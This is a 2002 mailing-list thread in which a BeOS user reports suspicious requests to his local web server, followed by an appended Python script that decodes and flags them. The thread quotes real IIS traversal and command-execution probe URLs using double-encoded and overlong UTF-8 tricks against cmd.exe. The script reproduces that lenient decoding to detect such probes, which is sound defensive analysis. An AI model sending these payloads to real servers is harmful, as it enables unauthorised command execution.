[openbeos] Re: I think someone tried to hack into my machine

  • From: GThom@xxxxxxxxxxxxxxxxxx
  • To: openbeos@xxxxxxxxxxxxx
  • Date: Tue, 19 Mar 2002 08:13:52 -0500

I run a personal web server using RobinHood (Road Runner cable modem); I get
this all the time!!!

They are very standard methods of hacking IIS. 

Gary Thom

-----Original Message-----
From: Daniel Reinhold [mailto:danielr@xxxxxxxxxxxxx]
Sent: 19 March, 2002 2:49 AM
To: Public OBOS mailing list
Subject: [openbeos] I think someone tried to hack into my machine

Ok, this was rather interesting. It happened just about fifteen minutes
ago (as I'm writing this).

I'm online (PPP dialup) and am also running a local webserver (i.e.
sending requests to loopback address 127.0.0.1). Yeah, that's asking
for trouble, at least theoretically. That is, someone on the internet,
if they happened to get a hold of my (temporary, dynamically assigned)
IP, could send requests for local files and have them sent back out
across the network. I've never had anything weird happen before, so
I've always been pretty blase about the security risk.

Anyway, I'm just testing some news items locally before copying them
over to the OpenBeOS website (which is my usual MO). Suddenly, I notice
the Terminal window (largely covered by another window, but partially
showing) has a flurry of text flying by and the DUN replicant in the
Deskbar shows lots of bytes transmitting back and forth. Wtf? So I
uncover the Terminal window (which is running the webserver) and see
that a number of unusual requests have just been attended to. Here's
the first one:

GET /scripts/root.exe?/c+dir HTTP/1.0
Host: www
Connnection: close

The remaining requests all look like that but with different URLs. Here
are the other URLs that were requested:

GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

To me, that looks for all the world like some hacker trying to grab files
from my local machine. Could there be another explanation?

Of course, I'm running BeOS (and don't have NT) so my local webserver
just returned a bunch of 404 (Not found) responses. Still, makes you
wonder.

Has anyone else on this list had any similar experiences? What do you
make of this?
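Added example, written for this page and not part of either message above: a small Python decoder that processes the request paths quoted in the original post the way a lax server would (percent-decode once, fold overlong two-byte UTF-8 sequences such as %c0%2f and %c1%1c into the '/' and '\' they encode, then percent-decode a second time so that %255c becomes '\'), resolves the '..' segments, and flags any request that climbs above the web root or names cmd.exe or root.exe. The sample log is constructed from the request lines in the post (the wrapped lines rejoined) plus one benign request for contrast; the indicator list, the reason strings and the function names are the example's own choices, not anything from the list or from BeOS's RobinHood server.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample log: the request lines quoted in the post above
# (wrapped lines rejoined), plus one benign request for contrast.
SAMPLE_LOG = [
    "GET /scripts/root.exe?/c+dir HTTP/1.0",
    "GET /MSADC/root.exe?/c+dir HTTP/1.0",
    "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "GET /news/index.html HTTP/1.0",
]

# File names that, on a request line, mark a command-execution probe
# (example's own choice of indicators).
INDICATORS = ("cmd.exe", "root.exe")


def _fold_overlong(raw: bytes) -> bytes:
    """Collapse each two-byte sequence with a 0xC0/0xC1 lead byte into the
    single ASCII byte it (over-long) encodes, WITHOUT checking that the
    second byte is a valid continuation byte.  This mimics a lenient decoder:
    %c0%2f -> '/', %c1%1c -> '\\'.  A strict UTF-8 decoder rejects both."""
    out = bytearray()
    i = 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def canonicalize(path: str) -> str:
    """Decode a request path as a lax server might: percent-decode, fold
    overlong UTF-8, percent-decode a second time, treat backslash as a
    separator, then resolve '.' and '..' segments.  '..' segments that climb
    above the web root are kept at the front so the caller can see the escape."""
    once = _fold_overlong(unquote_to_bytes(path))
    twice = unquote_to_bytes(once).decode("latin-1")  # second decode: %255c -> %5c -> '\'
    segments = []
    for seg in twice.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments and segments[-1] != "..":
                segments.pop()
            else:
                segments.append("..")
        else:
            segments.append(seg)
    return "/" + "/".join(segments)


def classify(request_line: str) -> dict:
    """Split one request line, canonicalize its path and list the reasons it
    looks like a traversal / command-execution probe (empty list = benign)."""
    parts = request_line.split()
    method, target = parts[0], parts[1]
    path, _, query = target.partition("?")
    canon = canonicalize(path)
    reasons = []
    if canon.startswith("/.."):
        reasons.append("escapes web root")
    if any(canon.lower().endswith("/" + name) for name in INDICATORS):
        reasons.append("requests " + canon.rsplit("/", 1)[1])
    if "%25" in path.lower():
        reasons.append("double-encoded")
    if re.search(r"%c[01]%", path, re.IGNORECASE):
        reasons.append("overlong utf-8")
    if re.match(r"/c\+", query):
        reasons.append("cmd /c argument in query")
    return {"method": method, "raw": path, "canonical": canon,
            "query": query, "reasons": reasons}


def scan(log_lines) -> list:
    """Return (raw path, canonical path, reasons) for every flagged request."""
    results = [classify(line) for line in log_lines]
    return [(r["raw"], r["canonical"], r["reasons"]) for r in results if r["reasons"]]


if __name__ == "__main__":
    for raw, canon, reasons in scan(SAMPLE_LOG):
        print(f"{raw}\n    -> {canon}  [{', '.join(reasons)}]")
```

Running it prints the ten probe lines with their decoded targets (for instance /scripts/..%255c../winnt/system32/cmd.exe resolves to /../winnt/system32/cmd.exe) and leaves the benign /news/index.html request unflagged. The lenient folding step exists only so the analyst can see what each probe was aiming at; a server should never decode this way, and a non-IIS server answering 404, as RobinHood did in the post, is the expected outcome.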
